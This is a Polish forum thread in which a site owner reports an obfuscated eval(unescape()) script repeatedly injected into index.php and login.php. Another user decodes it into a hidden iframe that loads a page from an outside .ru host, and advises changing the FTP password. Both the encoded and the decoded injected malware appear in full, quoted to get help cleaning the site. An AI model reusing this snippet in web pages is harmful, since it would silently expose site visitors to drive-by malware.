Skrypt ladujacy strone w pliku[php] Opcje

[ManiQu]

Witam.
W kilku plikach pojawilo mi sie cos takiego:

Kod

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%34%34%39%29%2b%27%31%61%32%62%5c%27%20%77%69%64%74%68%3d%38%37%20%68%65%69%67%68%74%3d%33%32%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Ładuje prawdopodobnie trojana. Bo mi zawsze wykrywa go avast. Trojan jest uczepliwy. Ciezko usunac. Moze ktos obczaic jaka to strona?
Pozdrawiam
P.S. gdy usune to z pliku za kilka dni znowu sie pojawia. Tylko ja mam dostep do ftp. Jakis hacker moze to zrobic?

[michu2510]

to oznacza to :

Kod

window.status='Done';document.write('<iframe name=42 src=\'http://alltraff.ru/lol.php?'+Math.round(Math.random()*28449)+'1a2b\' width=87 height=327 style=\'display: none\'></iframe>')

zmien haslo na ftp

[ManiQu]

Musi byc jakis hacker. Dal to w index.php i login.php

[michu2510]

a podaj adres do strony może jest w niej błąd pozwalający na wejście hakerowi

[ManiQu]

czy moglby ktos podejrzec pliczki? WWW podam na PW.